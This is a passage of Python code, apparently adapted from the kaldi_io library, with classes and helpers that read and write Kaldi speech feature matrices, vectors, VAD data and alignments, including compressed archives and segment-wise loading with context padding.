"""Read kaldi features"""
def __init__(self, data):
"""This is a modified version of read_mat_scp in kaldi_io.
I wrote the class because we don't want to open and close file frequently.
The number of file descriptors is limited (= the num of arks) so we can keep all the files open.
Once the feature archive is opened, it just keeps the file descriptors until the class is closed.
Args:
data: The kaldi data directory.
"""
self.fd = {}
self.data = data
self.dim = self.get_dim()
self.xvector_dim = self.get_xvector_dim()
self.utt2num_frames = {}
# Load utt2num_frames that the object can find the length of the utterance quickly.
assert os.path.exists(os.path.join(data, "utt2num_frames")), "[Error] Expect utt2num_frames exists in %s " % data
with open(os.path.join(data, "utt2num_frames"), 'r') as f:
for line in f.readlines():
utt, length = line.strip().split(" ")
self.utt2num_frames[utt] = int(length)
def get_dim(self):
with open(os.path.join(self.data, "feats.scp"), "r") as f:
dim = self.read(f.readline().strip())[0].shape[1]
return dim
def get_xvector_dim(self):
with open(os.path.join(self.data, "xvector.scp"), "r") as f:
xvector_dim = self.read_xvector(f.readline().strip()).shape[1]
return xvector_dim
def close(self):
for name in self.fd:
self.fd[name].close()
def read(self, file_or_fd, length=None, shuffle=False, start=None):
""" [mat, start_point] = read(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
In our case, file_or_fd can only be a filename with offset. We will save the fd after opening it.
Note:
It is really painful to load data from compressed archives. To speed up training, the archives should be
prepared as uncompressed data. Directly exit if loading data from compressed data. If you really like to
use that, modify by yourself.
Maybe other high-performance library can be used to accelerate the loading. No time to try here.
"""
utt, file_or_fd = file_or_fd.split(" ")
(filename, offset) = file_or_fd.rsplit(":", 1)
if filename not in self.fd:
fd = open(filename, 'rb')
assert fd is not None
self.fd[filename] = fd
# Move to the target position
self.fd[filename].seek(int(offset))
try:
binary = self.fd[filename].read(2).decode()
if binary == '\0B':
mat = _read_mat_binary(self.fd[filename])
else:
pass
except:
raise IOError("Cannot read features from %s" % file_or_fd)
if length is not None:
if start is None:
num_features = mat.shape[0]
length = num_features if length > num_features else length
start = random.randint(0, num_features - length) if shuffle else 0
mat = mat[start:start + length, :]
else:
assert not shuffle, "The start point is specified, thus shuffling is invalid."
mat = mat[start:start + length, :]
return mat, start
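# Usage sketch for FeatureReader.read (paths and utterance names are illustrative;
# the argument mirrors a feats.scp line, i.e. "utt path/to/feats.ark:offset"):
#   reader = FeatureReader("data/train")
#   mat, start = reader.read("utt1 exp/feats.ark:16", length=200, shuffle=True)
#   reader.close()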
def read_xvector(self, file_or_fd, length=None, shuffle=False, start=None):
utt, file_or_fd = file_or_fd.split(" ")
(filename, offset) = file_or_fd.rsplit(":", 1)
if filename not in self.fd:
fd = open(filename, 'rb')
assert fd is not None
self.fd[filename] = fd
# Move to the target position
self.fd[filename].seek(int(offset))
try:
binary = self.fd[filename].read(2).decode()
if binary == '\0B':
fd=self.fd[filename]
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
elif header == 'FV ': sample_size = 4 # floats
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
#pdb.set_trace()
assert (fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
#vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
#s1, cols = np.frombuffer(fd.read(10), dtype='int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(1,vec_size))
else:
raise IOError("Cannot read features from %s" % file_or_fd)
except:
raise IOError("Cannot read features from %s" % file_or_fd)
return mat
def read_segment(self, file_or_fd, length=None, shuffle=False, start=None):
""" [mat, start_point] = read_segment(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
We can load a segment of the feature, rather than the entire recording.
I hope the segment-wise loading is helpful in the long utterance case.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
In our case, file_or_fd can only be a filename with offset. We will save the fd after opening it.
"""
utt, file_or_fd = file_or_fd.split(" ")
(filename, offset) = file_or_fd.rsplit(":", 1)
if filename not in self.fd:
fd = open(filename, 'rb')
assert fd is not None
self.fd[filename] = fd
# Move to the target position
self.fd[filename].seek(int(offset))
try:
binary = self.fd[filename].read(2).decode()
if binary == '\0B':
# Do we need to load the entire recording?
if length is not None:
if start is None:
num_features = self.utt2num_frames[utt]
length = num_features if length > num_features else length
start = random.randint(0, num_features - length) if shuffle else 0
mat = _read_submat_binary(self.fd[filename], start, length)
else:
assert not shuffle, "The start point is specified, thus shuffling is invalid."
mat = _read_submat_binary(self.fd[filename], start, length)
else:
mat = _read_mat_binary(self.fd[filename])
else:
raise IOError("Cannot read features from %s" % file_or_fd)
except:
raise IOError("Cannot read features from %s" % file_or_fd)
return mat, start
class FeatureReaderV2(object):
"""Read kaldi features and alignments.
This is used for multitask_v1 training.
"""
def __init__(self, data_dir, ali_dir, left_context, right_context):
"""data_dir contains feats.scp, utt2num_frames, vad.scp.
ali_dir contains pdf.scp (NOT ali.scp) which is confusing here.
ali.scp consists of transition ids while pdf.scp consists of pdf ids.
So ali.scp should be converted to pdf.scp before training.
In Kaldi, ali-to-pdf and ali-to-post is used in the egs generation script.
Args:
data_dir: The kaldi data directory.
ali_dir: The kaldi ali directory.
"""
self.ali_fd = {}
self.vad_fd = {}
self.fd = {}
self.left_context = left_context
self.right_context = right_context
self.data_dir = data_dir
self.ali_dir = ali_dir
# Load utt2num_frames that the object can find the length of the utterance quickly.
self.utt2num_frames = {}
assert os.path.exists(os.path.join(data_dir, "utt2num_frames")), "[Error] Expect utt2num_frames exists in %s " % data_dir
with open(os.path.join(data_dir, "utt2num_frames"), 'r') as f:
for line in f.readlines():
utt, length = line.strip().split(" ")
self.utt2num_frames[utt] = int(length)
# We do not have offset here. So we have to record the offset in different files in order to seek them quickly.
self.utt2feats_offset = {}
assert os.path.exists(os.path.join(data_dir, "feats.scp")), "[ERROR] Expect feats.scp exists in %s" % data_dir
with open(os.path.join(data_dir, "feats.scp")) as f:
for line in f.readlines():
utt, info = line.strip().split(" ")
info = info.split(":")
# info[0] is the filename, info[1] is the offset
self.utt2feats_offset[utt] = [info[0], int(info[1])]
self.utt2vad_offset = {}
assert os.path.exists(os.path.join(data_dir, "vad.scp")), "[ERROR] Expect vad.scp exists in %s" % data_dir
with open(os.path.join(data_dir, "vad.scp")) as f:
for line in f.readlines():
utt, info = line.strip().split(" ")
info = info.split(":")
self.utt2vad_offset[utt] = [info[0], int(info[1])]
self.utt2ali_offset = {}
assert os.path.exists(os.path.join(ali_dir, "pdf.scp")), "[ERROR] Expect pdf.scp exists in %s" % ali_dir
with open(os.path.join(ali_dir, "pdf.scp")) as f:
for line in f.readlines():
utt, info = line.strip().split(" ")
info = info.split(":")
self.utt2ali_offset[utt] = [info[0], int(info[1])]
self.dim = self.get_dim()
def get_dim(self):
with open(os.path.join(self.data_dir, "feats.scp"), "r") as f:
dim = self.read_segment(f.readline().split(" ")[0])[0].shape[1]
return dim
def close(self):
for name in self.fd:
self.fd[name].close()
for name in self.vad_fd:
self.vad_fd[name].close()
for name in self.ali_fd:
self.ali_fd[name].close()
def read_segment(self, filename, length=None, shuffle=False, start=None):
""" [mat, vad, ali, start_point] = read_segment(file_or_fd)
filename : The filename we want to load.
In order to load vad.scp and pdf.scp as well as feats.scp, we need the name of the feature.
Unlike FeatureReader, the filename should not contain offset.
The feature expansion is applied. The returned feature will be longer than the specified length.
"""
utt = filename
feats_filename, feats_offset = self.utt2feats_offset[utt]
if feats_filename not in self.fd:
fd = open(feats_filename, 'rb')
assert fd is not None
self.fd[feats_filename] = fd
# Load the features
self.fd[feats_filename].seek(feats_offset)
try:
binary = self.fd[feats_filename].read(2).decode()
num_features = self.utt2num_frames[utt]
if binary == '\0B':
# Do we need to load the entire recording?
if length is not None:
# The length is specified
if start is None:
# If the length is too long, clip it to #frames
length = num_features if length > num_features else length
if shuffle:
start = random.randint(0, num_features-1)
if start + length > num_features:
start = num_features - length
real_start = start - self.left_context
real_length = length + self.left_context + self.right_context
else:
# Load from the very beginning
start = 0
real_start = start - self.left_context
real_length = length + self.left_context + self.right_context
else:
assert not shuffle, "The start point is specified, thus shuffling is invalid."
if start + length > num_features:
# The length is too long that we should shorten it.
length = num_features - start
# The left_context is considered
real_start = start - self.left_context
real_length = length + self.left_context + self.right_context
else:
# We want the entire utterance
start = 0
length = num_features
real_start = start - self.left_context
real_length = length + self.left_context + self.right_context
# Load the feature using real_start and real_length
# Note: The real_start can be < 0 and the real_length can be > num_features
# Do feature expansion if that happens.
tmp_start = max(real_start, 0)
tmp_end = min(real_start + real_length, num_features)
mat = _read_submat_binary(self.fd[feats_filename], tmp_start, tmp_end - tmp_start)
if real_start < 0:
# Left expansion
left_mat = np.tile(mat[0, :], [-real_start, 1])
mat = np.concatenate([left_mat, mat], axis=0)
if real_start + real_length > num_features:
# Right expansion
right_mat = np.tile(mat[-1, :], [real_start + real_length - num_features, 1])
mat = np.concatenate([mat, right_mat], axis=0)
assert(mat.shape[0] == real_length)
else:
raise IOError("Cannot read features from %s" % feats_filename)
except:
raise IOError("Cannot read features from %s" % feats_filename)
# start and length were obtained from the feature loading above.
# Use them in the vad and alignment loading.
vad_filename, vad_offset = self.utt2vad_offset[utt]
if vad_filename not in self.vad_fd:
vad_fd = open(vad_filename, 'rb')
assert vad_fd is not None
self.vad_fd[vad_filename] = vad_fd
# Load the vad
self.vad_fd[vad_filename].seek(vad_offset)
try:
binary = self.vad_fd[vad_filename].read(2).decode()
if binary == '\0B': # binary flag
vad = _read_subvec_flt_binary(self.vad_fd[vad_filename], start, length)
else: # ascii,
raise IOError("Cannot read vad from %s" % vad_filename)
except:
raise IOError("Cannot read vad from %s" % vad_filename)
# Use start, length to load alignment
ali_filename, ali_offset = self.utt2ali_offset[utt]
if ali_filename not in self.ali_fd:
ali_fd = open(ali_filename, 'rb')
assert ali_fd is not None
self.ali_fd[ali_filename] = ali_fd
# Load the alignment
self.ali_fd[ali_filename].seek(ali_offset)
try:
binary = self.ali_fd[ali_filename].read(2).decode()
if binary == '\0B': # binary flag
ali = _read_subvec_int_binary(self.ali_fd[ali_filename], start, length)
else: # ascii,
raise IOError("Cannot read ali from %s" % ali_filename)
except:
raise IOError("Cannot read ali from %s" % ali_filename)
assert(mat.shape[0] == vad.shape[0] + self.left_context + self.right_context and
mat.shape[0] == ali.shape[0] + self.left_context + self.right_context)
return mat, vad, ali, start
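# Worked example of the context expansion above (numbers are illustrative):
#   left_context=2, right_context=2, num_features=100, start=0, length=50
#   -> real_start=-2, real_length=54; the first frame is tiled twice on the left,
#      so mat has 54 rows while vad and ali keep 50, matching the final assert.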
#################################################
# Data-type independent helper functions,
def open_or_fd(file, mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
Eventually seeks to the offset if the 'file' argument contains a ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix,file) = file.split(':',1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file,offset) = file.rsplit(':',1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], 'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], 'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
# Eventually seek to offset,
if offset != None: fd.seek(int(offset))
return fd
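# Usage sketch for open_or_fd (paths are illustrative):
#   fd = open_or_fd('feats.ark:1024')            # plain file, seeks to offset 1024
#   fd = open_or_fd('gunzip -c feats.ark.gz |')  # input pipe, handled by popen()
#   fd = open_or_fd('ark:feats.ark')             # optional 'ark:'/'scp:' prefix is stripped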
# based on '/usr/local/lib/python3.4/os.py'
def popen(cmd, mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess, io, threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd,ret))
return
# text-mode,
if mode == "r":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode("latin1")
if char == '' : break
if char == ' ' : break
key += char
key = key.strip()
if key == '': return None # end of file,
assert(re.match('^\S+$',key) != None) # check format (no whitespace!)
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd)
def read_vec_int_ark(file_or_fd):
""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_int(file_or_fd):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
# Elements from int32 vector are stored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(vec_size*5), dtype=[('size','int8'),('value','int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd : fd.close() # cleanup
return ans
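# Binary layout consumed by read_vec_int / _read_subvec_int_binary below:
#   '\0B'                     binary flag
#   '\4' + int32              vector dimension
#   dim x ('\4' + int32)      one (size byte, value) pair per element,
#                             i.e. 5 bytes per element, hence the '* 5' reads.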
def _read_subvec_int_binary(fd, start, length):
assert (fd.read(1).decode() == '\4') # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
assert start + length <= vec_size
if start > 0:
fd.seek(start * 5, 1)
# Elements from int32 vector are stored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(length * 5), dtype=[('size', 'int8'), ('value', 'int32')], count=length)
assert (vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
return ans
# Writing,
def write_vec_int(file_or_fd, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_int(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd : fd.close()
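# Illustrative round trip for the integer-vector helpers above, kept as a
# comment so importing this module stays side-effect free; the file name
# 'ali.ark' and key 'utt1' are just examples:
#
#   v = np.array([1, 2, 3, 4], dtype='int32')
#   with open('ali.ark', 'wb') as f:
#       write_vec_int(f, v, key='utt1')
#   d = {k: vec for k, vec in read_vec_int_ark('ali.ark')}
#   assert (d['utt1'] == v).all()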
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile)
yield key, vec
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt_ark(file_or_fd):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_flt(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_flt(file_or_fd):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
# Data type,
header = fd.read(3).decode()
if header == 'FV ': sample_size = 4 # floats
elif header == 'DV ': sample_size = 8 # doubles
else: raise UnknownVectorHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimension,
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : ans = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
return ans
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd : fd.close() # cleanup
return ans
def _read_subvec_flt_binary(fd, start, length):
# Data type,
header = fd.read(3).decode()
if header == 'FV ':
sample_size = 4 # floats
elif header == 'DV ':
sample_size = 8 # doubles
else:
raise UnknownVectorHeader("The header contained '%s'" % header)
assert (sample_size > 0)
# Dimension,
assert (fd.read(1).decode() == '\4') # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
assert start + length <= vec_size
# seek from the current position
if start > 0:
fd.seek(start * sample_size, 1)
buf = fd.read(length * sample_size)
if sample_size == 4:
ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8:
ans = np.frombuffer(buf, dtype='float64')
else:
raise BadSampleSize
return ans
# Writing,
def write_vec_flt(file_or_fd, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32': fd.write('FV '.encode())
elif v.dtype == 'float64': fd.write('DV '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
mat = read_mat(rxfile)
yield key, mat
finally:
if fd is not file_or_fd : fd.close()
def read_mat_ark(file_or_fd):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
mat = read_mat(fd)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_mat(file_or_fd):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd)
try:
binary = fd.read(2).decode()
if binary == '\0B' :
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd: fd.close()
return mat
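# Sketch of the common scp-style access pattern (assuming open_or_fd accepts
# the 'file:offset' syntax found in feats.scp entries; the path and offset
# below are made up):
#
#   mat = read_mat('some_dir/feats.ark:12345')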
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(rows,cols))
return mat
def _read_submat_binary(fd, start, length):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_submat(fd, header, start, length)
else:
raise ValueError("The features should be in the compressed format.")
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0) : raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0 : continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr,dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1],dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Mapping for percentiles in col-headers,
def uint16_to_float(value, min, range):
return np.float32(min + range * 1.52590218966964e-05 * value)
# Mapping for matrix elements,
def uint8_to_float_v2(vec, p0, p25, p75, p100):
# Split the vector by masks,
mask_0_64 = (vec <= 64);
mask_65_192 = np.all([vec>64, vec<=192], axis=0);
mask_193_255 = (vec > 192);
# Sanity check (useful but slow...),
# assert(len(vec) == np.sum(np.hstack([mask_0_64,mask_65_192,mask_193_255])))
# assert(len(vec) == np.sum(np.any([mask_0_64,mask_65_192,mask_193_255], axis=0)))
# Build the float vector,
ans = np.empty(len(vec), dtype='float32')
ans[mask_0_64] = p0 + (p25 - p0) / 64. * vec[mask_0_64]
ans[mask_65_192] = p25 + (p75 - p25) / 128. * (vec[mask_65_192] - 64)
ans[mask_193_255] = p75 + (p100 - p75) / 63. * (vec[mask_193_255] - 192)
return ans
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
# The data is structured as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8', count=cols*rows), newshape=(cols,rows)) # stored as col-major,
mat = np.empty((cols,rows), dtype='float32')
for i, col_header in enumerate(col_headers):
col_header_flt = [ uint16_to_float(percentile, globmin, globrange) for percentile in col_header ]
mat[i] = uint8_to_float_v2(data[i], *col_header_flt)
return mat.T # transpose! col-major -> row-major,
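# Worked example of the 8-bit de-quantization above (values illustrative):
# with per-column percentiles p0=0.0, p25=1.0, p75=3.0, p100=6.0, a stored
# byte of 64 decodes to p25 = 1.0, a byte of 192 decodes to p75 = 3.0, and a
# byte of 255 decodes to p75 + (p100 - p75) / 63. * 63 = 6.0 = p100.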
def _read_compressed_submat(fd, format, start, length):
""" Read a compressed sub-matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Mapping for percentiles in col-headers,
def uint16_to_float(value, min, range):
return np.float32(min + range * 1.52590218966964e-05 * value)
# Mapping for matrix elements,
def uint8_to_float_v2(vec, p0, p25, p75, p100):
# Split the vector by masks,
mask_0_64 = (vec <= 64);
mask_65_192 = np.all([vec>64, vec<=192], axis=0);
mask_193_255 = (vec > 192);
# Sanity check (useful but slow...),
# assert(len(vec) == np.sum(np.hstack([mask_0_64,mask_65_192,mask_193_255])))
# assert(len(vec) == np.sum(np.any([mask_0_64,mask_65_192,mask_193_255], axis=0)))
# Build the float vector,
ans = np.empty(len(vec), dtype='float32')
ans[mask_0_64] = p0 + (p25 - p0) / 64. * vec[mask_0_64]
ans[mask_65_192] = p25 + (p75 - p25) / 128. * (vec[mask_65_192] - 64)
ans[mask_193_255] = p75 + (p100 - p75) / 63. * (vec[mask_193_255] - 192)
return ans
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
assert rows >= (start + length), "The number of frames is not enough for length %d" % length
sub_rows = length
mat = np.zeros((cols, sub_rows), dtype='float32')
# The data is structured as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
col_left = 0
for i, col_header in enumerate(col_headers):
col_header_flt = [uint16_to_float(percentile, globmin, globrange) for percentile in col_header]
# Read data in col-major.
# It is not necessary to load all the data
# Seek to the start point from the current position.
fd.seek(col_left + start, 1)
data = np.frombuffer(fd.read(length), dtype='uint8', count=length)
mat[i] = uint8_to_float_v2(data, *col_header_flt)
col_left = rows - (start + length)
fd.seek(col_left, 1)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename of opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32': fd.write('FM '.encode())
elif m.dtype == 'float64': fd.write('DM '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
